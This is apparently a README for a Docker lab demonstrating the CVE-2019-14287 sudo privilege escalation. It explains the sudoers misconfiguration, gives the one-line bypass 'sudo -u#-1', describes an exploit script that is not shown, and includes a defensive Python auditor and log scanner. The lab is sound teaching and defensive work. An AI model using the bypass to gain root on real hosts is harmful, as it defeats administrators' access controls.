This attack maps to the MITRE ATT&CK Privilege Escalation tactic, using the Sudo technique.
It relies on a misconfiguration in the sudoers file in combination with the sudo bug described in CVE-2019-14287.
This vulnerability allows a non-root user to run commands as root. sudo accepts a numeric user id in place of a username (`-u#<uid>`) as the target user for a command. If an attacker passes -1 or 4294967295 as the user id, they gain the ability to run commands as root.
For this exploit to work, the /etc/sudoers file has to be misconfigured in a specific way (and sudo has to be an affected release; the container below uses sudo 1.8.27). An example of such a misconfiguration:

```
<username> ALL=(ALL, !root) /bin/cat
```

The entry above lets `<username>` run /bin/cat on ALL hosts as any user except root. That restriction is bypassed, and the command runs as root, when the user invokes:

```
sudo -u#-1 /bin/cat
```
For the sake of brevity, I will not go into the root cause of this issue here.
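As an added defender-side example (not the repository's exploit.py), the Python script below turns the description above into two checks: it audits sudoers-style entries for a Runas list that excludes root while still allowing other targets, the `(ALL, !root)` shape that sudo releases before 1.8.28 turn into root access, and it scans syslog-style sudo records for a target user of #-1 or #4294967295. The sudoers lines and log lines in the block are constructed for the example; the grammar handled is the simplified one used in this README, and the log layout assumed is the `USER=... ; COMMAND=...` record that sudo writes to syslog.

```python
"""Defender-side checks for the CVE-2019-14287 sudo bug.

Added example for this README; it is not the repository's exploit.py.
  1. audit_sudoers(): flag entries whose Runas list negates root
     ('!root' or '!#0') while still allowing other targets, e.g.
         <user> ALL=(ALL, !root) /bin/cat
     On sudo < 1.8.28 such an entry is reachable as root via -u#-1.
  2. find_uid_minus_one(): scan syslog-style sudo records for a
     target user of #-1 or #4294967295.
All sample data below is constructed for the example.
"""
import re

# Simplified sudoers grammar: user host=(runas_users[:runas_groups]) [TAG:] command
ENTRY_RE = re.compile(
    r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?:[A-Z]+:\s*)*"          # NOPASSWD:, SETENV:, ... (ignored here)
    r"(?P<cmd>.+?)\s*$"
)


def parse_entry(line):
    """Return {'user', 'host', 'runas_users', 'command'} or None if unparsable."""
    m = ENTRY_RE.match(line)
    if not m:
        return None
    runas = m.group("runas")
    users = []
    if runas is not None:
        # "(users : groups)": only the user part matters for this bug
        users = [u.strip() for u in runas.split(":")[0].split(",") if u.strip()]
    return {"user": m.group("user"), "host": m.group("host"),
            "runas_users": users, "command": m.group("cmd")}


def is_cve_2019_14287_prone(entry):
    """True when root is excluded by negation but other targets remain allowed."""
    users = entry["runas_users"]
    negates_root = any(u in ("!root", "!#0") for u in users)
    allows_others = any(not u.startswith("!") for u in users)
    return negates_root and allows_others


def audit_sudoers(lines):
    """Return (line_no, user, command) for every prone entry."""
    findings = []
    for n, raw in enumerate(lines, 1):
        s = raw.strip()
        if not s or s.startswith("#") or s.startswith("Defaults"):
            continue
        if s.split()[0].endswith("_Alias"):   # User_Alias / Cmnd_Alias definitions
            continue
        entry = parse_entry(s)
        if entry and is_cve_2019_14287_prone(entry):
            findings.append((n, entry["user"], entry["command"]))
    return findings


# syslog-style sudo record: "... sudo:  user : TTY=... ; USER=<runas> ; COMMAND=..."
SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<runas>\S+)\s*;.*?COMMAND=(?P<cmd>.*)$"
)
SUSPICIOUS_RUNAS = {"#-1", "#4294967295"}


def find_uid_minus_one(log_lines):
    """Return (caller, runas, command) for sudo records naming uid -1."""
    hits = []
    for line in log_lines:
        m = SUDO_LOG_RE.search(line)
        if m and m.group("runas") in SUSPICIOUS_RUNAS:
            hits.append((m.group("user"), m.group("runas"), m.group("cmd").strip()))
    return hits


# Constructed sample sudoers; not a real /etc/sudoers.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
saad    ALL=(ALL, !root) /bin/bash
alice   ALL=(ALL, !root) NOPASSWD: /bin/cat
bob     ALL=(www-data) /usr/bin/id
carol   ALL=(ALL) /usr/bin/id
""".splitlines()

# Constructed sample syslog lines in sudo's record shape.
SAMPLE_LOG = """\
Oct 14 10:01:02 host sudo:     saad : TTY=pts/0 ; PWD=/home/saad ; USER=#-1 ; COMMAND=/bin/bash
Oct 14 10:01:30 host sudo:    carol : TTY=pts/1 ; PWD=/home/carol ; USER=root ; COMMAND=/usr/bin/id
Oct 14 10:02:11 host sudo:    alice : TTY=pts/2 ; PWD=/tmp ; USER=#4294967295 ; COMMAND=/bin/cat
""".splitlines()

if __name__ == "__main__":
    for n, user, cmd in audit_sudoers(SAMPLE_SUDOERS):
        print(f"sudoers line {n}: '{user}' can reach root via -u#-1 with {cmd}")
    for user, runas, cmd in find_uid_minus_one(SAMPLE_LOG):
        print(f"log: {user} invoked sudo with target user {runas}: {cmd}")
```

Run against a real host, `audit_sudoers` would read `/etc/sudoers` and the files under `/etc/sudoers.d`, and `find_uid_minus_one` the auth log; the two checks are independent, so the config audit is useful even after sudo is upgraded, since a `!root` negation is still a weak way to restrict a Runas list.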
The exploit tries several commands to see whether each can be used to obtain root access. For every command that succeeds, it points out the corresponding misconfiguration in the sudoers file, and at the end it prints a summary of the commands that yielded root access.
For demonstration purposes, the user saad is set up to have sudo access to the bash command only.
The exploit checks the commands '/usr/bin/id', 'bash' and '/bin/cat'.
- Base OS: Linux/macOS. (It may work on Windows too, but has not been tested there.)
- Open source software:
  - Docker version 19.03.4
  - docker-compose version 1.24.1
  - git
The Docker container is built so that it satisfies all the preconditions for successful execution of the exploit. Those preconditions are:
- OS: ubuntu:18.04
- Programs: git, python3.6, python3-pip, wget, gcc, make and sudo version 1.8.27
- Fire up the base OS and Docker. Once Docker is up and running, clone this repository using `git clone` or download it manually.
- Open a terminal in the directory where the files are located.
- Make sure that docker-compose.yml, Dockerfile, exploit.py and README.md are present before moving on to the next step.
- Run the following commands in the order specified below:

```
docker-compose build
docker-compose run sudoexploit
```
- At this point, the exploit code runs and writes its results to the tty.
- If the exploit is successful, the summary lines say:

```
The user can run the sudo exploit using these command(s)['bash']
Exploit successful
```

- If no command has sudo access, the summary line says:

```
Exploit was not successful. No exploitable commands found.
```

- If a user other than the one specified in the exploit code tries to run the exploit, the summary line says:

```
Exploit cannot be run if user is not saad.
```

- Should an error occur, the summary line says:

```
An error occured during the exploit execution
```

- In addition to the above, the tty output describes which commands work and which do not.
- Run the following commands in the order specified below:

```
docker-compose stop
docker-compose down
docker image rm sudoexploit
```

- Delete the directory which contains all the files on the base OS.